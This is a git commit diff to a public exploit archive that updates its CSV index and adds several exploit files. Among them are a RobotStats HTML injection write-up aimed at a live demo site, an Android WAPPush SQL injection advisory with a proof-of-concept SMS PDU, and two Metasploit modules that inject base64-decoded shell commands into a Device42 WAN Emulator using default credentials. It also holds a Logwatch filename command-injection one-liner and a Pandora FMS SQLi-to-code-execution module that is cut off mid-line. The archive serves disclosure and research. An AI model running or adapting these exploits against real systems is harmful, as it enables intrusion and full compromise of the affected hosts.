Updated 11_28_2014
This commit is contained in:
parent
e88829222c
commit
9195172fad
16 changed files with 1382 additions and 2 deletions
18
files.csv
18
files.csv
|
@ -19578,7 +19578,7 @@ id,file,description,date,author,platform,type,port
|
|||
22353,platforms/linux/remote/22353.c,"BitchX 1.0 - Remote Send_CTCP() Memory Corruption Vulnerability",2003-03-06,eSDee,linux,remote,0
|
||||
22354,platforms/windows/local/22354.c,"Microsoft Windows 2000 Help Facility .CNT File :Link Buffer Overflow Vulnerability",2003-03-09,s0h,windows,local,0
|
||||
22355,platforms/cgi/remote/22355.txt,"Thunderstone TEXIS 3.0 'texis.exe' Information Disclosure Vulnerability",2003-03-14,sir.mordred@hushmail.com,cgi,remote,0
|
||||
22356,platforms/unix/remote/22356.c,"Samba SMB 2.2.x,CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow Vulnerability",2003-03-15,flatline,unix,remote,0
|
||||
22356,platforms/unix/remote/22356.c,"Samba SMB 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow Vulnerability",2003-03-15,flatline,unix,remote,0
|
||||
22357,platforms/asp/webapps/22357.txt,"RSA ClearTrust 4.6/4.7 Login Page Cross Site Scripting Vulnerability",2003-03-15,sir.mordred@hushmail.com,asp,webapps,0
|
||||
22358,platforms/multiple/dos/22358.cfm,"Sun JDK/SDK 1.3/1.4,IBM JDK 1.3.1,BEA Systems WebLogic 5/6/7 java.util.zip Null Value Denial of Service (1)",2003-03-15,"Marc Schoenefeld",multiple,dos,0
|
||||
22359,platforms/multiple/dos/22359.xsl,"Sun JDK/SDK 1.3/1.4,IBM JDK 1.3.1,BEA Systems WebLogic 5/6/7 java.util.zip Null Value Denial of Service (2)",2003-03-15,"Marc Schoenefeld",multiple,dos,0
|
||||
|
@ -30023,7 +30023,7 @@ id,file,description,date,author,platform,type,port
|
|||
33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0
|
||||
33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80
|
||||
33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 (.ogg) - Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0
|
||||
33336,platforms/linux/local/33336.txt,"Linux Kernel 3.3-3.8 - SOCK_DIAG Local Root Exploit",2013-02-24,SynQ,linux,local,0
|
||||
33336,platforms/linux/local/33336.txt,"Linux Kernel 3.3 < 3.8 - SOCK_DIAG Local Root Exploit",2013-02-24,SynQ,linux,local,0
|
||||
33337,platforms/osx/dos/33337.c,"Apple Mac OS X 10.5.x 'ptrace' Mutex Handling Local Denial of Service Vulnerability",2009-11-04,"Micheal Turner",osx,dos,0
|
||||
33338,platforms/linux/dos/33338.c,"Linux Kernel 2.6.x 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"Robin Getz",linux,dos,0
|
||||
33339,platforms/linux/remote/33339.txt,"CUPS 'kerberos' Parameter Cross Site Scripting Vulnerability",2009-11-09,"Aaron Sigel",linux,remote,0
|
||||
|
@ -31831,7 +31831,9 @@ id,file,description,date,author,platform,type,port
|
|||
35338,platforms/php/webapps/35338.txt,"TaskFreak 0.6.4 rss.php HTTP Referer Header XSS",2011-02-12,LiquidWorm,php,webapps,0
|
||||
35340,platforms/php/webapps/35340.txt,"Wordpress wpDataTables Plugin 1.5.3 - SQL Injection Vulnerability",2014-11-24,"Claudio Viviani",php,webapps,0
|
||||
35341,platforms/php/webapps/35341.py,"Wordpress wpDataTables Plugin 1.5.3 - Unauthenticated Shell Upload Vulnerability",2014-11-24,"Claudio Viviani",php,webapps,0
|
||||
35342,platforms/aix/dos/35342.txt,"RobotStats 1.0 - HTML Injection Vulnerability",2014-11-24,"ZoRLu Bugrahan",aix,dos,0
|
||||
35343,platforms/php/webapps/35343.txt,"Smarty Template Engine <= 2.6.9 '$smarty.template' PHP Code Injection Vulnerability",2011-02-09,jonieske,php,webapps,0
|
||||
35344,platforms/php/webapps/35344.txt,"RobotStats 1.0 - (robot param) SQL Injection Vulnerability",2014-11-24,"ZoRLu Bugrahan",php,webapps,0
|
||||
35345,platforms/hardware/webapps/35345.txt,"TP-Link TL-WR740N - Denial Of Service",2014-11-24,LiquidWorm,hardware,webapps,0
|
||||
35346,platforms/php/webapps/35346.txt,"DukaPress 2.5.2 - Path Traversal",2014-11-24,"Kacper Szurek",php,webapps,0
|
||||
35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 'style' Parameter Cross Site Scripting Vulnerability",2011-02-12,"AutoSec Tools",php,webapps,0
|
||||
|
@ -31860,3 +31862,15 @@ id,file,description,date,author,platform,type,port
|
|||
35373,platforms/php/webapps/35373.txt,"WordPress GD Star Rating Plugin 1.9.7 'wpfn' Parameter Cross Site Scripting Vulnerability",2011-02-22,"High-Tech Bridge SA",php,webapps,0
|
||||
35374,platforms/php/webapps/35374.txt,"IBM Lotus Sametime Server 8.0 'stcenter.nsf' Cross Site Scripting Vulnerability",2011-02-22,andrew,php,webapps,0
|
||||
35375,platforms/php/webapps/35375.txt,"Vanilla Forums 2.0.17.x 'p' Parameter Cross Site Scripting Vulnerability",2011-02-22,"Aung Khant",php,webapps,0
|
||||
35376,platforms/php/webapps/35376.txt,"mySeatXT 0.164 'lang' Parameter Local File Include Vulnerability",2011-02-16,"AutoSec Tools",php,webapps,0
|
||||
35377,platforms/windows/local/35377.rb,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow",2014-11-26,"Muhamad Fadzil Ramli",windows,local,0
|
||||
35379,platforms/windows/dos/35379.go,"Elipse E3 HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80
|
||||
35380,platforms/php/remote/35380.rb,"Pandora FMS SQLi Remote Code Execution",2014-11-26,metasploit,php,remote,80
|
||||
35381,platforms/php/webapps/35381.txt,"xEpan 1.0.1 - CSRF Vulnerability",2014-11-26,"High-Tech Bridge SA",php,webapps,80
|
||||
35382,platforms/android/dos/35382.txt,"Android WAPPushManager - SQL Injection",2014-11-26,"Baidu X-Team",android,dos,0
|
||||
35383,platforms/cgi/webapps/35383.rb,"Device42 WAN Emulator 2.3 Traceroute Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80
|
||||
35384,platforms/cgi/webapps/35384.rb,"Device42 WAN Emulator 2.3 Ping Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80
|
||||
35385,platforms/php/webapps/35385.pl,"Slider Revolution/Showbiz Pro Shell Upload Exploit",2014-11-26,"Simo Ben Youssef",php,webapps,80
|
||||
35386,platforms/linux/remote/35386.txt,"Logwatch Log File Special Characters Local Privilege Escalation Vulnerability",2011-02-24,"Dominik George",linux,remote,0
|
||||
35387,platforms/php/webapps/35387.txt,"phpShop 0.8.1 'page' Parameter Cross Site Scripting Vulnerability",2011-02-25,"Aung Khant",php,webapps,0
|
||||
35388,platforms/php/webapps/35388.txt,"WordPress HTML 5 MP3 Player with Playlist Plugin - Full Path Disclosure",2014-11-27,"KnocKout inj3ct0r",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
111
platforms/aix/dos/35342.txt
Executable file
111
platforms/aix/dos/35342.txt
Executable file
|
@ -0,0 +1,111 @@
|
|||
# Title : RobotStats v1.0 HTML Injection Vulnerability
|
||||
# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
|
||||
# Home : http://milw00rm.com / its online
|
||||
# Twitter : https://twitter.com/milw00rm or @milw00rm
|
||||
# Date : 22.11.2014
|
||||
# Demo : http://alpesoiseaux.free.fr/robotstats/
|
||||
# Download : http://www.robotstats.com/en/robotstats.zip
|
||||
# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
|
||||
# Birkaciyiadam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) )
|
||||
|
||||
Desc.:
|
||||
no security for admin folder (session control, login panel or anyone... maybe its different vulnerability)
|
||||
and no any filter for html code at robots.lib.php. you can inject your html code or xss code.
|
||||
|
||||
html inj.:
|
||||
|
||||
target.com/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME(orwriteyourindexcode)&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=
|
||||
|
||||
after you go here:
|
||||
|
||||
target.com/robotstats/info-robot.php?robot=(robot id)
|
||||
|
||||
or
|
||||
|
||||
target.com/robotstats/admin/robots.php you will see your html page
|
||||
|
||||
analysis: (/admin/robots.php)
|
||||
|
||||
include "robots.lib.php"; //line 26
|
||||
|
||||
else if ($rub == "ajouter")
|
||||
{
|
||||
updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detection, $descr_fr, $descr_en, $url); //line 65 (we will be analysis to robots.lib.php for line)
|
||||
}
|
||||
|
||||
analysis: (/admin/robots.lib.php)
|
||||
|
||||
you look code. you will see blank control for "name" and "user agent" but will'nt see any filter for inject (// look line 203 no any filter) no any control or filter for code inject.
|
||||
|
||||
function updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detection, $descr_fr, $descr_en, $url)
|
||||
//line 163 (remember function line 65 in robots.php)
|
||||
{
|
||||
global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP;
|
||||
|
||||
// dans tous les cas :
|
||||
echo "<p class='normal'><a class='erreur'> ";
|
||||
$msg = "";
|
||||
|
||||
// test du nom
|
||||
if ($nom == '') //line 172 control of blank or not blank
|
||||
{
|
||||
$msg = $RS_LANG["BadRobotName"];
|
||||
}
|
||||
|
||||
// test selon le mode de detection
|
||||
if ($detection == $RS_DETECTION_USER_AGENT) //line 178 control of your "detection mode" choice
|
||||
{
|
||||
if ($user_agent == '') //line 180 control of blank or not blank
|
||||
{
|
||||
$msg = $RS_LANG["BadUserAgent"];
|
||||
}
|
||||
}
|
||||
else if ($detection == $RS_DETECTION_IP) //line 185 control of your "detection mode" choice
|
||||
{
|
||||
if ( ($ip1 == '') && ($ip2 == '') ) //line 187 control of your "ip1 and ip2" choice
|
||||
{
|
||||
$msg = $RS_LANG["IPNotSpecified"];
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
$msg = $RS_LANG["BadDetectionMode"];
|
||||
}
|
||||
|
||||
if ($msg != "")
|
||||
{
|
||||
echo $msg;
|
||||
}
|
||||
else
|
||||
{
|
||||
$liste_champs = "nom, actif, user_agent, ip1, ip2, detection, descr_fr, descr_en, url"; // line 203 no any filter
|
||||
$liste_valeurs = "\"$nom\", \"$actif\", \"$user_agent\", \"$ip1\", \"$ip2\", \"$detection\", \"$descr_fr\", \"$descr_en\", \"$url\"";
|
||||
if ($robot > 0) // cas d'une modification et non d'un ajout //line 205 control of your choice "wanna update any bot or add new bot"
|
||||
{
|
||||
$liste_champs .= ", id";
|
||||
$liste_valeurs .= ", '$robot'";
|
||||
$sql = "REPLACE INTO ".$RS_TABLE_ROBOTS." ($liste_champs) VALUES ($liste_valeurs)";
|
||||
$res = mysql_query($sql) or erreurServeurMySQL($sql);
|
||||
echo $RS_LANG["RobotUpdated"];
|
||||
}
|
||||
else
|
||||
{
|
||||
$sql = "INSERT INTO ".$RS_TABLE_ROBOTS." ($liste_champs) VALUES ($liste_valeurs)";
|
||||
$res = mysql_query($sql) or erreurServeurMySQL($sql);
|
||||
echo $RS_LANG["RobotAdded"];
|
||||
}
|
||||
}
|
||||
|
||||
for demo:
|
||||
|
||||
http://alpesoiseaux.free.fr/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=
|
||||
|
||||
after you go here:
|
||||
|
||||
http://alpesoiseaux.free.fr/robotstats/info-robot.php?robot=(robot id)
|
||||
|
||||
or
|
||||
|
||||
http://alpesoiseaux.free.fr/robotstats/admin/robots.php
|
||||
|
||||
you will see your html page
|
143
platforms/android/dos/35382.txt
Executable file
143
platforms/android/dos/35382.txt
Executable file
|
@ -0,0 +1,143 @@
|
|||
INTRODUCTION
|
||||
==================================
|
||||
In Android <5.0, a SQL injection vulnerability exists in the opt module WAPPushManager, attacker can remotely send malformed WAPPush message to launch any activity or service in the victim's phone (need permission check)
|
||||
|
||||
DETAILS
|
||||
==================================
|
||||
When a WAPPush message is received, the raw pdu is processed by dispatchWapPdu method in com\android\internal\telephony\WapPushOverSms.java
|
||||
|
||||
Here the pdu is parsed to get the contentType & wapAppId:
|
||||
|
||||
String mimeType = pduDecoder.getValueString();
|
||||
...
|
||||
/**
|
||||
* Seek for application ID field in WSP header.
|
||||
* If application ID is found, WapPushManager substitute the message
|
||||
* processing. Since WapPushManager is optional module, if WapPushManager
|
||||
* is not found, legacy message processing will be continued.
|
||||
*/
|
||||
if (pduDecoder.seekXWapApplicationId(index, index + headerLength - 1)) {
|
||||
index = (int) pduDecoder.getValue32();
|
||||
pduDecoder.decodeXWapApplicationId(index);
|
||||
String wapAppId = pduDecoder.getValueString();
|
||||
if (wapAppId == null) {
|
||||
wapAppId = Integer.toString((int) pduDecoder.getValue32());
|
||||
}
|
||||
String contentType = ((mimeType == null) ?
|
||||
Long.toString(binaryContentType) : mimeType);
|
||||
if (DBG) Rlog.v(TAG, "appid found: " + wapAppId + ":" + contentType);
|
||||
|
||||
The wapAppId & contentType can be literal string embeded in the pdu, to prove this, we can launch Android 4.4 emulator and send sms pdu by telnet console
|
||||
|
||||
Type the following command in telnet console:
|
||||
|
||||
sms pdu 0040000B915121551532F40004800B05040B84C0020003F001010A065603B081EAAF2720756e696f6e2073656c65637420302c27636f6d2e616e64726f69642e73657474696e6773272c27636f6d2e616e64726f69642e73657474696e67732e53657474696e6773272c302c302c302d2d200002066A008509036D6F62696C65746964696E67732E636F6D2F0001
|
||||
|
||||
And watch the radio logcat message in emulator, it prints out the extracted malicious appid:
|
||||
' union select 0,'com.android.settings','com.android.settings.Settings',0,0,0--
|
||||
|
||||
However, since the WAPPushManager is optional, it is not installed in the emulator, so it then prints "wap push manager not found!"
|
||||
|
||||
But if the WAPPushManager is installed, the extracted wapAppId & contentType will be send to its method processMessage:
|
||||
|
||||
try {
|
||||
boolean processFurther = true;
|
||||
IWapPushManager wapPushMan = mWapPushManager;
|
||||
if (wapPushMan == null) {
|
||||
if (DBG) Rlog.w(TAG, "wap push manager not found!");
|
||||
} else {
|
||||
Intent intent = new Intent();
|
||||
intent.putExtra("transactionId", transactionId);
|
||||
intent.putExtra("pduType", pduType);
|
||||
intent.putExtra("header", header);
|
||||
intent.putExtra("data", intentData);
|
||||
intent.putExtra("contentTypeParameters",
|
||||
pduDecoder.getContentParameters());
|
||||
int procRet = wapPushMan.processMessage(wapAppId, contentType, intent);
|
||||
|
||||
So we go on checking the source code of WAPPushManager:
|
||||
|
||||
https://android.googlesource.com/platform/frameworks/base/+/android-4.4.4_r2.0.1/packages/WAPPushManager/
|
||||
|
||||
In the method processMessage, the app_id and content_type is used in the method queryLastApp:
|
||||
|
||||
public int processMessage(String app_id, String content_type, Intent intent)
|
||||
throws RemoteException {
|
||||
Log.d(LOG_TAG, "wpman processMsg " + app_id + ":" + content_type);
|
||||
WapPushManDBHelper dbh = getDatabase(mContext);
|
||||
SQLiteDatabase db = dbh.getReadableDatabase();
|
||||
WapPushManDBHelper.queryData lastapp = dbh.queryLastApp(db, app_id, content_type);
|
||||
db.close();
|
||||
|
||||
Then in the method queryLastApp, both app_id and content_type is concatenated without any escaping to build the rawQuery sql input,
|
||||
|
||||
protected queryData queryLastApp(SQLiteDatabase db,
|
||||
String app_id, String content_type) {
|
||||
String sql = "select install_order, package_name, class_name, "
|
||||
+ " app_type, need_signature, further_processing"
|
||||
+ " from " + APPID_TABLE_NAME
|
||||
+ " where x_wap_application=\'" + app_id + "\'"
|
||||
+ " and content_type=\'" + content_type + "\'"
|
||||
+ " order by install_order desc";
|
||||
if (DEBUG_SQL) Log.v(LOG_TAG, "sql: " + sql);
|
||||
Cursor cur = db.rawQuery(sql, null);
|
||||
|
||||
Obviously, this is a SQL injection, for example, if app_id is as follows:
|
||||
' union select 0,'com.android.settings','com.android.settings.Settings',0,0,0--
|
||||
|
||||
Then the package_name & class_name of query result would be:
|
||||
"com.android.settings" and "com.android.settings.Setttings"
|
||||
|
||||
OK, then we return back to the method processMessage of WAPPushManager
|
||||
The appType, packageName, className is fully controllable, which will be used to set the component of an intent to start a activity or service
|
||||
That means, attacker can remotely launch any activity or service by construct malformed WAPPush Message (need permission check)
|
||||
|
||||
if (lastapp.appType == WapPushManagerParams.APP_TYPE_ACTIVITY) {
|
||||
//Intent intent = new Intent(Intent.ACTION_MAIN);
|
||||
intent.setClassName(lastapp.packageName, lastapp.className);
|
||||
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
|
||||
try {
|
||||
mContext.startActivity(intent);
|
||||
} catch (ActivityNotFoundException e) {
|
||||
Log.w(LOG_TAG, "invalid name " +
|
||||
lastapp.packageName + "/" + lastapp.className);
|
||||
return WapPushManagerParams.INVALID_RECEIVER_NAME;
|
||||
}
|
||||
} else {
|
||||
intent.setClassName(mContext, lastapp.className);
|
||||
intent.setComponent(new ComponentName(lastapp.packageName,
|
||||
lastapp.className));
|
||||
if (mContext.startService(intent) == null) {
|
||||
Log.w(LOG_TAG, "invalid name " +
|
||||
lastapp.packageName + "/" + lastapp.className);
|
||||
return WapPushManagerParams.INVALID_RECEIVER_NAME;
|
||||
}
|
||||
}
|
||||
|
||||
This has been fixed in android 5.0 (android bug id 17969135)
|
||||
https://android.googlesource.com/platform/frameworks/base/+/48ed835468c6235905459e6ef7df032baf3e4df6
|
||||
|
||||
TIMELINE
|
||||
==================================
|
||||
11.10.2014 Initial report to Android Security Team with the POC
|
||||
14.10.2014 Reply from Android Security Team "are looking into it"
|
||||
04.11.2014 Android 5.0 source code is open, the fix for this issue is found in change log, request status update
|
||||
08.11.2014 Reply from Android Security Team "have fixed the issue in L (which is now in AOSP) and have provided patches to partners"
|
||||
09.11.2014 Contact MITRE about this issue
|
||||
17.11.2014 CVE-2014-8507 assigned
|
||||
26.11.2014 Public Disclosure
|
||||
|
||||
IDENTIFIERS
|
||||
==================================
|
||||
CVE-2014-8507
|
||||
Android id 17969135
|
||||
|
||||
CREDITS
|
||||
==================================
|
||||
WangTao (neobyte) of Baidu X-Team
|
||||
WangYu of Baidu X-Team
|
||||
Zhang Donghui of Baidu X-Team
|
||||
|
||||
--
|
||||
BAIDU X-TEAM (xteam.baidu.com)
|
||||
An external link of this advisory can be found at http://xteam.baidu.com/?p=167
|
103
platforms/cgi/webapps/35383.rb
Executable file
103
platforms/cgi/webapps/35383.rb
Executable file
|
@ -0,0 +1,103 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'WAN Emulator v2.3 Command Execution',
|
||||
'Description' => %q{
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Privileged' => true,
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Author' =>
|
||||
[
|
||||
'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "",
|
||||
'DisableNops' => true,
|
||||
#'Compat' =>
|
||||
# {
|
||||
# 'PayloadType' => 'cmd',
|
||||
# 'RequiredCmd' => 'generic netcat netcat-e',
|
||||
# }
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'ExitFunction' => 'none'
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic Targeting', { 'auto' => true }]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Aug 12 2012'
|
||||
))
|
||||
end
|
||||
|
||||
def exploit
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
|
||||
})
|
||||
|
||||
cookie = res.headers['Set-Cookie']
|
||||
|
||||
csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*)' \/><\/div>/
|
||||
|
||||
post = {
|
||||
'csrfmiddlewaretoken' => csrf,
|
||||
'username' => 'd42admin',
|
||||
'password' => 'default',
|
||||
'next' => '/'
|
||||
}
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
|
||||
'vars_post' => post,
|
||||
'method' => 'POST',
|
||||
'cookie' => cookie
|
||||
})
|
||||
|
||||
unless res.code == 302
|
||||
fail_with("auth failed")
|
||||
end
|
||||
|
||||
cookie = res.headers['Set-Cookie']
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'ping/'),
|
||||
'cookie' => cookie
|
||||
})
|
||||
|
||||
cookie = res.headers['Set-Cookie']
|
||||
csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*)' \/><\/div>/
|
||||
|
||||
post = {
|
||||
'csrfmiddlewaretoken' => csrf,
|
||||
'traceip' => "www.google.com`echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode|sh`",
|
||||
'trace' => ''
|
||||
}
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'ping/'),
|
||||
'method' => "POST",
|
||||
'vars_post' => post,
|
||||
'cookie' => cookie
|
||||
})
|
||||
end
|
||||
end
|
103
platforms/cgi/webapps/35384.rb
Executable file
103
platforms/cgi/webapps/35384.rb
Executable file
|
@ -0,0 +1,103 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'WAN Emulator v2.3 Command Execution',
|
||||
'Description' => %q{
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Privileged' => true,
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Author' =>
|
||||
[
|
||||
'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "",
|
||||
'DisableNops' => true,
|
||||
#'Compat' =>
|
||||
# {
|
||||
# 'PayloadType' => 'cmd',
|
||||
# 'RequiredCmd' => 'generic netcat netcat-e',
|
||||
# }
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'ExitFunction' => 'none'
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic Targeting', { 'auto' => true }]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Aug 12 2012'
|
||||
))
|
||||
end
|
||||
|
||||
def exploit
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
|
||||
})
|
||||
|
||||
cookie = res.headers['Set-Cookie']
|
||||
|
||||
csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*)' \/><\/div>/
|
||||
|
||||
post = {
|
||||
'csrfmiddlewaretoken' => csrf,
|
||||
'username' => 'd42admin',
|
||||
'password' => 'default',
|
||||
'next' => '/'
|
||||
}
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
|
||||
'vars_post' => post,
|
||||
'method' => 'POST',
|
||||
'cookie' => cookie
|
||||
})
|
||||
|
||||
unless res.code == 302
|
||||
fail_with("auth failed")
|
||||
end
|
||||
|
||||
cookie = res.headers['Set-Cookie']
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'ping/'),
|
||||
'cookie' => cookie
|
||||
})
|
||||
|
||||
cookie = res.headers['Set-Cookie']
|
||||
csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*)' \/><\/div>/
|
||||
|
||||
post = {
|
||||
'csrfmiddlewaretoken' => csrf,
|
||||
'pingip' => "www.google.com`echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode|sh`",
|
||||
'ping' => ''
|
||||
}
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'ping/'),
|
||||
'method' => "POST",
|
||||
'vars_post' => post,
|
||||
'cookie' => cookie
|
||||
})
|
||||
end
|
||||
end
|
7
platforms/linux/remote/35386.txt
Executable file
7
platforms/linux/remote/35386.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/46554/info
|
||||
|
||||
Logwatch is prone to a local privilege-escalation vulnerability.
|
||||
|
||||
Local attackers can exploit this issue execute arbitrary code with superuser privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.
|
||||
|
||||
% echo "fake" > â??/var/log/httpd/fakee;who;access_log.2â??
|
317
platforms/php/remote/35380.rb
Executable file
317
platforms/php/remote/35380.rb
Executable file
|
@ -0,0 +1,317 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Pandora FMS SQLi Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module attempts to exploit multiple issues in order to gain remote
|
||||
code execution under Pandora FMS version <= 5.0 SP2. First, an attempt
|
||||
to authenticate using default credentials is performed. If this method
|
||||
fails, a SQL injection vulnerability is leveraged in order to extract
|
||||
the "Auto Login" password hash. If this value is not set, the module
|
||||
will then extract the administrator account's MD5 password hash.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Lincoln <Lincoln[at]corelan.be>', # Discovery, Original Proof of Concept
|
||||
'Jason Kratzer <pyoor[at]corelan.be>' # Metasploit Module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://pandorafms.com/downloads/whats_new_5-SP3.pdf'],
|
||||
['URL', 'http://blog.pandorafms.org/?p=2041']
|
||||
],
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' =>
|
||||
[
|
||||
['Pandora FMS version <= 5.0 SP2', {}]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 50000,
|
||||
'DisableNops' => true,
|
||||
},
|
||||
'DisclosureDate' => "Feb 1 2014",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The URI of the vulnerable Pandora FMS instance', '/pandora_console/']),
|
||||
OptString.new('USER', [false, 'The username to authenticate with', 'admin']),
|
||||
OptString.new('PASS', [false, 'The password to authenticate with', 'pandora']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def uri
|
||||
target_uri.path
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
vprint_status("#{peer} - Trying to detect installed version")
|
||||
|
||||
version = nil
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(uri, 'index.php')
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body =~ /Pandora FMS - the Flexible Monitoring System/
|
||||
if res.body =~ /<div id="ver_num">v(.*?)<\/div>/
|
||||
version = $1
|
||||
else
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
end
|
||||
|
||||
unless version.nil?
|
||||
vprint_status("#{peer} - Pandora FMS #{version} found")
|
||||
if Gem::Version.new(version) <= Gem::Version.new('5.0SP2')
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
|
||||
# Attempt to login with credentials (default admin:pandora)
|
||||
def authenticate
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'vars_get' => {
|
||||
'login' => "1",
|
||||
},
|
||||
'vars_post' => {
|
||||
'nick' => datastore['USER'],
|
||||
'pass' => datastore['PASS'],
|
||||
'Login' => 'Login',
|
||||
}
|
||||
})
|
||||
|
||||
return auth_succeeded?(res)
|
||||
end
|
||||
|
||||
# Attempt to login with auto login and SQLi
|
||||
def login_hash
|
||||
clue = rand_text_alpha(8)
|
||||
sql_clue = clue.each_byte.map { |b| b.to_s(16) }.join
|
||||
# select value from tconfig where token = 'loginhash_pwd';
|
||||
sqli = "1' AND (SELECT 2243 FROM(SELECT COUNT(*),CONCAT(0x#{sql_clue},(SELECT MID((IFNULL(CAST"
|
||||
